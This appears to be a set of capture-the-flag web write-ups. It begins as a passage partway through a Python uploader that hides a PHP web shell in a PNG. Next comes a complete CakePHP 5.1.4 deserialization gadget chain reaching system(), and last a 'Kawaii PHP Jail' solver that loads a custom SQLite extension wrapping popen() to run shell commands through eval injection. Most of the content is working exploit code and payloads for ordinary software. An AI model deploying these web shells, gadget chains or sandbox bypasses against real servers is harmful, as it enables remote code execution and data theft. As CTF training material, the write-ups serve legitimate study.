        :param size: Tuple specifying the image dimensions (width, height).
        :param output_file: Path to save the output PNG file.
        :raises ValueError: If *bits* does not fit into ``width * height`` pixels.
        """
        width, height = size
        capacity = width * height
        if len(bits) > capacity:
            # The original silently wrapped around through negative row indices.
            raise ValueError(
                f"{len(bits)} bits do not fit into a {width}x{height} image"
            )

        # Image arrays are indexed [row, column], i.e. shaped (height, width, channels).
        # The original allocated (width, height, 4), which only worked for squares.
        # Start from opaque white so only the alpha of the data pixels is written.
        im = np.full((height, width, 4), 255, np.uint8)

        for ind, bit in enumerate(bits):
            rows_from_bottom, x = divmod(ind, width)
            y = height - 1 - rows_from_bottom  # fill bottom-up
            im[y, x, 3] = (1 - int(bit)) * 255

        # Save the image to disk
        cv2.imwrite(output_file, im)
        print(f"Image saved to {output_file}")
    
    
    async def main():
        """Main function to generate and upload a payload as a PNG file."""

        # Generate payload and convert to bits (8 bits per byte, most significant first)
        payload = b"<?php system($_GET['c'])?>"
        bits = ''.join(format(byte, '08b') for byte in payload)

        print(bits)
        print(len(bits))

        # Image size
        size = (32, 32)

        # Generate the image from bits
        output_file = "result.png"
        generate_image_from_bits(bits, size, output_file)

        # Send the generated image to the server under the file name ".php".
        # The file handle and the HTTP client are both closed once the request
        # is done; the original leaked both.
        api = API()
        try:
            with open(output_file, "rb") as png_file:
                response = await api.convert_png_to_ico((".php", png_file, "image/png"))
        finally:
            await api.c.aclose()
        print(response.text)
    
    
    # Run the async entry point only when executed as a script.
    if __name__ == "__main__":
        asyncio.run(main())

    POP gadget in CakePHP 5.1.4

    Reference: SUCTF-2025 / web / SU_POP / writeup

    <?php
    // Generator for a serialized POP chain; the result is written to the file "ser".
    // The namespace separators had been stripped from this listing (for example
    // "CakeORMTable"); they are restored here so that the declared classes and the
    // references to them resolve to the same names.
    
    namespace React\Promise\Internal {
    
    // Outermost object of the payload; $reason holds the next object in the chain.
    class RejectedPromise
    {
        private $reason = "x";
    
        /** @var bool */
        private $handled = false;
    
        public function __construct($reason)
        {
            $this->reason = $reason;
        }
    }
    
    }
    
    namespace Cake\TestSuite\Constraint\Response {
    
    // Declared but not instantiated by this script.
    class HeaderEquals
    {
        protected string $headerName;
    }
    
    }
    
    namespace Twig {
    
    // Carries the name of the function to call ("system") in $parserCallbacks.
    class ExtensionSet
    {
        private $initialized = true;
        private $parserCallbacks = ["system"];
    }
    
    }
    
    namespace Cake\ORM {
    
    class Table
    {
        protected BehaviorRegistry $_behaviors;
    
        public function __construct()
        {
            $this->_behaviors = new \Cake\ORM\BehaviorRegistry();
        }
    
        // Wire up both stages of the chain:
        //   this table:  name()           -> Composer\Cache::clear()
        //   $table2:     emptydirectory() -> Twig\ExtensionSet::getTokenParser()
        public function initTable1()
        {
            $cache = new \Composer\Cache();
            $table2 = new \Cake\ORM\Table();
            $extSet = new \Twig\ExtensionSet();
    
            // Method-map keys are lower-case because the registry lower-cases the
            // requested method name before the lookup.
            $table2->_behaviors->setLoaded(
                [
                    "emptydirectory" => $extSet,
                    "x" => $extSet,
                    "lol" => new \React\Promise\Internal\RejectedPromise("lol")
                ],
                ["emptydirectory" => ["x", "getTokenParser"]]
            );
    
            $cache->setFilesystem($table2);
    
            $this->_behaviors->setLoaded(
                [
                    "name" => $cache,
                    "x" => $cache,
                    // "table" => new \React\Promise\Internal\RejectedPromise("lol")
                ],
                ["name" => ["x", "clear"]]
            );
        }
    }
    
    class BehaviorRegistry
    {
        protected array $_methodMap;
        protected array $_loaded;
    
        /*
        public function __construct()
        {
            $this->_loaded = [
                "name" => new \Composer\Cache(),
                "x" => new \Composer\Cache(),
                // "table" => new \React\Promise\Internal\RejectedPromise("lol")
            ];
        }
        */
    
        // $loaded maps behavior names to objects; $_methodMap maps a method name to
        // a [behavior name, method to call] pair.
        public function setLoaded($loaded, $_methodMap)
        {
            $this->_loaded = $loaded;
            $this->_methodMap = $_methodMap;
        }
    }
    
    }
    
    namespace Cake\Cache\Engine {
    
    // Declared but not instantiated by this script (see the commented-out line at the bottom).
    class RedisEngine
    {
        protected $_Redis;
    
        public function __construct()
        {
            $this->_Redis = new \Cake\ORM\Table();
        }
    }
    
    }
    
    namespace Cake\Database\Log {
    
    class LoggedQuery
    {
    }
    
    }
    
    namespace Cake\View {
    
    class Cell
    {
    }
    
    }
    
    namespace Cake\Http\Client {
    
    // $_parts holds a single Table that has been wired up by initTable1().
    class FormData
    {
        protected array $_parts = [];
    
        public function __construct()
        {
            $this->_parts = [new \Cake\ORM\Table()];
            $this->_parts[0]->initTable1();
        }
    }
    
    }
    
    namespace Cake\Collection\Iterator {
    
    // Declared but not instantiated by this script.
    class ReplaceIterator
    {
        protected $_callback = "system";
        protected \Traversable $_innerIterator;
    
        public function __construct()
        {
            $this->_innerIterator = new \ArrayIterator(["abcd"]);
        }
    }
    
    }
    
    /*
    React\Promise\Internal\RejectedPromise => __destruct => tostring
    Cake\Http\Client\FormData => toString
    */
    
    namespace Composer {
    
    /*
    public function exists(): bool
    {
        return $this->getAdapter()->hasTable($this->getName());
    }
    */
    
    // $root carries the shell command; $filesystem is the object on which
    // emptyDirectory($root) is called.
    class Cache
    {
        private $enabled = true;
        private $root = "find /flag.txt -exec cat {} \\;";
        private $filesystem;
    
        public function __construct()
        {
            // $this->filesystem = new \Cake\ORM\Table();
        }
    
        public function setFilesystem($filesystem)
        {
            $this->filesystem = $filesystem;
        }
    }
    
    }
    
    namespace {
        // $o = new \Cake\Cache\Engine\RedisEngine();
        // Only the last assignment to $e is used; the first two are leftovers.
        $e = new \Cake\Database\Log\LoggedQuery();
        $e = new \Cake\View\Cell();
        $e = new \Cake\Http\Client\FormData();
        $o = new \React\Promise\Internal\RejectedPromise($e);
        file_put_contents("ser", serialize($o));
    }
    ?>

    Usage note:

    /ser/?ser=base64encoded

    Related reference: CakePHP 反序列化 POP 链挖掘 - 先知社区

    yeah ill just drop the relevant snippets

    Relevant snippets

    public function __destruct()
    {
        if ($this->handled) {
            return;
        }
    
        $handler = set_rejection_handler(null);
    
        if ($handler === null) {
            $message = 'Unhandled promise rejection with ' . $this->reason;
    $this->reason is untyped so we can use any object here
    public function __toString(): string
    {
        if ($this->isMultipart()) {
            $boundary = $this->boundary();
            $out = '';
    
            foreach ($this->_parts as $part) {
                $out .= "--{$boundary}\\r\\n";
                $out .= (string)$part;
                $out .= "\\r\\n";
            }
    
            $out .= "--{$boundary}--\\r\\n";
            return $out;
        }
    
        $data = [];
    
        foreach ($this->_parts as $part) {
            $data[$part->name()] = $part->value();
    $this->_parts can be set to anything, so we use $part->name() to trigger __call of Cake\ORM\Table
    public function call(string $method, array $args = []): mixed
    {
        $method = strtolower($method);
    
        if ($this->hasMethod($method) && $this->has($this->_methodMap[$method][0])) {
            [$behavior, $callMethod] = $this->_methodMap[$method];
            return $this->_loaded[$behavior]->{$callMethod}(...$args);
        }
    We can set _methodMap and _loaded such that we have full control over $this->_loaded[$behavior]->{$callMethod}, but not $args.
    // Quoted library code: when the cache is enabled and not read-only, calls
    // emptyDirectory() on $this->filesystem with $this->root and returns true;
    // otherwise returns false.
    public function clear()
    {
        if ($this->isEnabled() && !$this->readOnly) {
            $this->filesystem->emptyDirectory($this->root);
            return true;
        }
    
        return false;
    }

    Kawaii PHP Jail

    Event Name-
    Source URL-
    Challenge NameKawaii PHP Jail
    Attachments
  • Manual upload: solve.py
  • References

  • Root cause: eval(isset($_GET['cmd']) ? $_GET['cmd'] : '') gives direct attacker-controlled PHP execution.
  • The jail blocks common process helpers, but it leaves file_put_contents() available, allows writes under /tmp, and does not block SQLite extension loading through PDO.
  • Final exploit chain: upload a base64-encoded shared object to /tmp/libhello_fd.so, decode it server-side, create new Pdo\Sqlite('sqlite::memory:'), call $db->loadExtension('/tmp/libhello_fd.so'), then execute SELECT exec_cmd('cat /flag.txt') via a function exported by the extension.
  • Validation: reran locally against http://localhost:12345/; the solver successfully loaded the extension and read /flag.txt.
  • why it is vulnerable

    // src/index.php
    echo eval(isset($_GET['cmd']) ? $_GET['cmd'] : '');
    
    // php.ini
    disable_functions = exec,shell_exec,system,passthru,...,dl,...
    open_basedir = /var/www/html:/tmp

    exploit payload

    $db = new Pdo\Sqlite('sqlite::memory:');
    $db->loadExtension('/tmp/libhello_fd.so');
    echo $db->query("SELECT exec_cmd('cat /flag.txt')")->fetchColumn();

    solver

    #include <stdio.h>
    #include <string.h>
    #include <sqlite3ext.h>
    SQLITE_EXTENSION_INIT1
    
    /*
     * SQL function body: runs argv[0] as a shell command via popen() and returns
     * its standard output as text. Output beyond 8191 bytes is discarded. If the
     * command cannot be started, an empty string is returned.
     */
    static void exec_function(sqlite3_context *context, int argc, sqlite3_value **argv) {
        (void)argc; /* registered with exactly one argument */
        const char *command = (const char*)sqlite3_value_text(argv[0]);
        /* sqlite3_value_text() yields NULL for an SQL NULL argument; passing that
         * to popen() would be undefined behaviour, so return SQL NULL instead. */
        if (command == NULL) {
            sqlite3_result_null(context);
            return;
        }
        FILE *fp = popen(command, "r");
        char buffer[4096], output[8192] = "";
        /* Keep reading until EOF even when output is full, so the child is drained. */
        while (fp && fgets(buffer, sizeof(buffer), fp)) {
            strncat(output, buffer, sizeof(output) - strlen(output) - 1);
        }
        if (fp) pclose(fp);
        /* SQLITE_TRANSIENT makes SQLite copy the stack buffer before we return. */
        sqlite3_result_text(context, output, -1, SQLITE_TRANSIENT);
    }
    
    /*
     * Extension entry point. The name matches what SQLite derives by default from
     * the file name libhello_fd.so: the "lib" prefix is dropped and only the
     * letters before the first '.' are kept, giving sqlite3_hellofd_init.
     * Registers the one-argument SQL function exec_cmd and returns the result
     * code of that registration, so a failure is reported to the loader.
     */
    int sqlite3_hellofd_init(sqlite3 *db, char **pzErrMsg, const sqlite3_api_routines *pApi) {
        (void)pzErrMsg; /* no custom error message is produced */
        SQLITE_EXTENSION_INIT2(pApi);
        return sqlite3_create_function(db, "exec_cmd", 1, SQLITE_UTF8, 0, exec_function, 0, 0);
    }
    import asyncio
    import base64
    import httpx
    
    URL = "http://localhost:12345/"
    # Base64 text of the compiled extension; the file is read through a context
    # manager so its handle is closed right away.
    with open("libhello_fd.so", "rb") as _so_file:
        SO_B64 = base64.b64encode(_so_file.read()).decode()
    
    async def php(code):
        """Send *code* to the target as the ``cmd`` query parameter and return the response text."""
        client = httpx.AsyncClient(base_url=URL, timeout=30)
        async with client as session:
            response = await session.get("/", params={"cmd": code})
            return response.text
    
    async def main():
        """Upload the extension in base64 chunks, decode it on the server, load it and print the command output."""
        chunk_size = 4000
        # The first chunk overwrites the staging file; later chunks are appended.
        for offset in range(0, len(SO_B64), chunk_size):
            piece = SO_B64[offset:offset + chunk_size]
            flags = ",FILE_APPEND" if offset != 0 else ""
            await php(f"file_put_contents('/tmp/libhello_fd.so.b64','{piece}'{flags});")
        # Decode the staged base64 text into the shared object.
        decode_code = "file_put_contents('/tmp/libhello_fd.so', base64_decode(file_get_contents('/tmp/libhello_fd.so.b64')));"
        await php(decode_code)
        # Load the extension into an in-memory SQLite database and call exec_cmd.
        run_code = "$db = new Pdo\\Sqlite('sqlite::memory:'); $db->loadExtension('/tmp/libhello_fd.so'); echo $db->query(\"SELECT exec_cmd('cat /flag.txt')\")->fetchColumn();"
        output = await php(run_code)
        print(output)
    
    # Script entry: runs immediately, there is no __main__ guard.
    asyncio.run(main())

    Categories & Topics

    This note is categorized under the following topics. Click on any category to explore more related content.

    Share this note

    Share:

    Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.